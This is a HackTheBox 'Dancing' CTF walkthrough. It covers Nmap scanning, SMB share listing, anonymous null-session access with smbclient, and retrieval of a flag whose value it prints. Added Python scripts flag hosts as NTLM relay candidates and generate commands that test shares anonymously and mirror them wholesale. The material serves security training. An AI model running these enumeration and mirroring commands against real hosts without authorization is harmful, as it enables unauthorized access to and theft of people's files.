
HackTheBox - Dancing

Dancing is one of the Starting Point machines on HackTheBox. In this CTF we learn about SMB (Server Message Block), the file-sharing protocol Windows hosts expose on port 445, and how to enumerate and read shares from Linux.

Introduction

  • Connect to the HackTheBox lab network using Pwnbox or OpenVPN.
  • Spawn the machine and note the target IP.

Enumeration

To confirm the target is reachable and to find its open ports, we use ping and Nmap.

Ping

After spawning the machine, start by pinging the target IP. Replies with TTL 127 (the Windows default of 128, minus one hop) already hint at a Windows target; the Nmap scan confirms it.

❯ ping 10.129.236.96

PING 10.129.236.96 (10.129.236.96) 56(84) bytes of data.
64 bytes from 10.129.236.96: icmp_seq=1 ttl=127 time=263 ms
64 bytes from 10.129.236.96: icmp_seq=2 ttl=127 time=286 ms
64 bytes from 10.129.236.96: icmp_seq=3 ttl=127 time=310 ms
64 bytes from 10.129.236.96: icmp_seq=4 ttl=127 time=231 ms

--- 10.129.236.96 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3002ms
rtt min/avg/max/mdev = 231.476/272.733/309.960/28.947 ms

Nmap

Nmap finds the open ports and identifies what is listening on them. -sCV is shorthand for -sC (run Nmap's default NSE script set against each open port) plus -sV (probe each service for its version). Note that without -p Nmap only scans its 1000 most common TCP ports; add -p- when you want all 65535.

❯ nmap -sCV 10.129.236.96

Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-25 05:12 WIB
Nmap scan report for JSN.JaringanKU (10.129.236.96)
Host is up (0.25s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT    STATE SERVICE       VERSION
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2023-12-25T02:14:25
|_  start_date: N/A
|_clock-skew: 4h00m00s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 94.36 seconds
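The host script output is worth reading before moving on. smb2-security-mode reports SMB dialect 3.1.1 with "Message signing enabled but not required", the default on a Windows host that is not a domain controller; it means the server will accept unsigned sessions, which is the precondition for NTLM relay attacks against it. The Python below is an added example, not part of the original write-up: it pulls the open ports, dialect, signing state and clock skew out of Nmap's normal text output so the check can be repeated over saved scans. The sample text is the scan above reduced to the relevant lines.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, Optional

# Constructed sample: the relevant lines of the nmap -sCV output above.
# Any scan saved with -oN (nmap's normal text output) has the same layout.
NMAP_OUTPUT = """\
Nmap scan report for 10.129.236.96
Host is up (0.25s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT    STATE SERVICE       VERSION
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2023-12-25T02:14:25
|_  start_date: N/A
|_clock-skew: 4h00m00s
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
"""

# One port line, e.g. "445/tcp open  microsoft-ds?"
PORT_RE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)", re.M)
# The three phrasings the smb2-security-mode NSE script prints.
SIGNING_RE = re.compile(
    r"Message signing (enabled and required|enabled but not required|disabled)")
# Dialect line inside the smb2-security-mode block, e.g. "|   3:1:1:"
DIALECT_RE = re.compile(r"^\|\s+(\d+(?:[:.]\d+)+):\s*$", re.M)


@dataclass
class SmbPosture:
    open_tcp: Dict[int, str] = field(default_factory=dict)  # port -> service name
    dialect: Optional[str] = None      # e.g. "3:1:1" (SMB 3.1.1)
    signing: Optional[str] = None      # "required" | "not_required" | "disabled"
    clock_skew: Optional[str] = None   # as printed by the clock-skew script


def parse_nmap(text: str) -> SmbPosture:
    """Extract the SMB-relevant facts from nmap's normal text output."""
    p = SmbPosture()
    for m in PORT_RE.finditer(text):
        if m["proto"] == "tcp" and m["state"] == "open":
            p.open_tcp[int(m["port"])] = m["service"]
    m = DIALECT_RE.search(text)
    if m:
        p.dialect = m.group(1)
    m = SIGNING_RE.search(text)
    if m:
        p.signing = {"enabled and required": "required",
                     "enabled but not required": "not_required",
                     "disabled": "disabled"}[m.group(1)]
    m = re.search(r"^\|_clock-skew:\s*(\S+)", text, re.M)
    if m:
        p.clock_skew = m.group(1)
    return p


def relay_candidate(p: SmbPosture) -> bool:
    """SMB is reachable and the server accepts unsigned sessions, so an NTLM
    authentication relayed to it would not be rejected on signing grounds."""
    return 445 in p.open_tcp and p.signing in ("not_required", "disabled")


def summary(p: SmbPosture) -> str:
    ports = ", ".join(f"{port}/{svc}" for port, svc in sorted(p.open_tcp.items()))
    return (f"open tcp: {ports}; smb dialect {p.dialect}; signing {p.signing}; "
            f"relay candidate: {relay_candidate(p)}")


if __name__ == "__main__":
    print(summary(parse_nmap(NMAP_OUTPUT)))
```

The 4h00m00s clock skew is also worth keeping: Kerberos tolerates only a few minutes of drift, so if the box were domain-joined you would have to correct your clock before any ticket-based authentication.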

Foothold

The scan shows port 445/tcp open, which is SMB over TCP (139/tcp is the older NetBIOS session transport for the same service). On Linux the Samba suite's smbclient speaks this protocol, so we can use it to talk to the Windows host.

SMB/SAMBA

Run smbclient with -L to list the shares the host exposes. It prompts for a password; pressing Enter sends an empty one.

❯ smbclient -L 10.129.236.96

Password for [WORKGROUP\huda]:

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	WorkShares      Disk      

SMB1 disabled -- no workgroup available

The $ suffix marks a hidden administrative share: ADMIN$, C$ and IPC$ are created by Windows by default and do not appear in browse lists. It does not by itself mean a password is required, and a missing $ does not mean the share is open; whether anonymous access works is a per-share permission, so test it. -N tells smbclient to attempt a null session, that is, to connect without sending a password. Here the custom WorkShares share allows it.

❯ smbclient -N //10.129.236.96/WorkShares

Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Mar 29 15:22:01 2021
  ..                                  D        0  Mon Mar 29 15:22:01 2021
  Amy.J                               D        0  Mon Mar 29 16:08:24 2021
  James.P                             D        0  Thu Jun  3 15:38:03 2021

		5114111 blocks of size 4096. 1748932 blocks available
smb: \> cd Amy.J
smb: \Amy.J\> ls
  .                                   D        0  Mon Mar 29 16:08:24 2021
  ..                                  D        0  Mon Mar 29 16:08:24 2021
  worknotes.txt                       A       94  Fri Mar 26 18:00:37 2021

		5114111 blocks of size 4096. 1748932 blocks available
smb: \Amy.J\> get worknotes.txt
getting file \Amy.J\worknotes.txt of size 94 as worknotes.txt (0,1 KiloBytes/sec) (average 0,1 KiloBytes/sec)
smb: \Amy.J\> cd ..
smb: \> cd James.P
smb: \James.P\> ls
  .                                   D        0  Thu Jun  3 15:38:03 2021
  ..                                  D        0  Thu Jun  3 15:38:03 2021
  flag.txt                            A       32  Mon Mar 29 16:26:57 2021

		5114111 blocks of size 4096. 1748900 blocks available
smb: \James.P\> echo flag.txt
echo <num> <data>
smb: \James.P\> get flag.txt
getting file \James.P\flag.txt of size 32 as flag.txt (0,0 KiloBytes/sec) (average 0,1 KiloBytes/sec)
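Doing this share by share with cd, ls and get is fine for two directories, but the same logic is quickly scripted. The Python below is an added example, not part of the original write-up: it parses the table that smbclient -L prints, orders the disk shares for null-session testing (custom shares first, the $ administrative shares after them, since the suffix alone decides nothing), and builds the smbclient command lines to test each one and to mirror an accessible share in a single command using recurse, prompt and mget. The host address and the listing are the ones from this box.

```python
import re
import shlex
from dataclasses import dataclass
from typing import List

# Constructed sample: the share table printed by `smbclient -L` above.
SHARE_LISTING = """\
\tSharename       Type      Comment
\t---------       ----      -------
\tADMIN$          Disk      Remote Admin
\tC$              Disk      Default share
\tIPC$            IPC       Remote IPC
\tWorkShares      Disk

SMB1 disabled -- no workgroup available
"""


@dataclass
class Share:
    name: str
    type: str      # "Disk", "IPC" or "Printer"
    comment: str

    @property
    def hidden(self) -> bool:
        # A trailing $ only hides the share from browse lists; it says nothing
        # about whether anonymous access is permitted.
        return self.name.endswith("$")


def parse_share_list(text: str) -> List[Share]:
    """Parse the table that smbclient -L prints. Columns are separated by
    runs of at least two spaces, so a share name containing a single space
    still parses; the table ends at the first blank line."""
    shares: List[Share] = []
    in_table = False
    for line in text.splitlines():
        stripped = line.strip()
        if not in_table:
            # The dashed underline sits between the header and the first row.
            in_table = stripped.startswith("---")
            continue
        if not stripped:
            break
        parts = re.split(r"\s{2,}", stripped, maxsplit=2)
        if len(parts) < 2:
            continue
        comment = parts[2] if len(parts) == 3 else ""
        shares.append(Share(parts[0], parts[1], comment))
    return shares


def null_session_targets(shares: List[Share]) -> List[Share]:
    """Disk shares in the order worth trying anonymously: custom (non-$)
    shares first, the built-in administrative ones after them. Anonymous
    access is a per-share permission, so every one of them gets tested."""
    disk = [s for s in shares if s.type == "Disk"]
    return sorted(disk, key=lambda s: (s.hidden, s.name))


def null_session_cmd(host: str, share: str) -> str:
    """smbclient invocation that attempts a null session (-N: no password)
    and lists the share root; -c runs the commands and exits."""
    return shlex.join(["smbclient", "-N", f"//{host}/{share}", "-c", "ls"])


def mirror_cmd(host: str, share: str) -> str:
    """Fetch every file on an accessible share in one go instead of cd/get by
    hand: recurse ON descends into directories, prompt OFF stops mget asking
    for confirmation per file."""
    return shlex.join(["smbclient", "-N", f"//{host}/{share}",
                       "-c", "recurse ON; prompt OFF; mget *"])


if __name__ == "__main__":
    host = "10.129.236.96"
    for s in null_session_targets(parse_share_list(SHARE_LISTING)):
        print(null_session_cmd(host, s.name))
    print(mirror_cmd(host, "WorkShares"))
```

shlex.join quotes share names containing spaces or shell metacharacters, so the generated lines can be pasted or passed to a shell as they are. Run the mirror command from an empty directory: mget recreates the share's directory tree under the current working directory.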

After downloading both files, exit smbclient and read them from the working directory.

❯ ls
 flag.txt
 worknotes.txt

❯ cat worknotes.txt
- start apache server on the linux machine
- secure the ftp server
- setup winrm on dancing

❯ cat flag.txt
5f61c10dffbc77a704d76016a22f1664
This post is licensed under CC BY 4.0 by the author.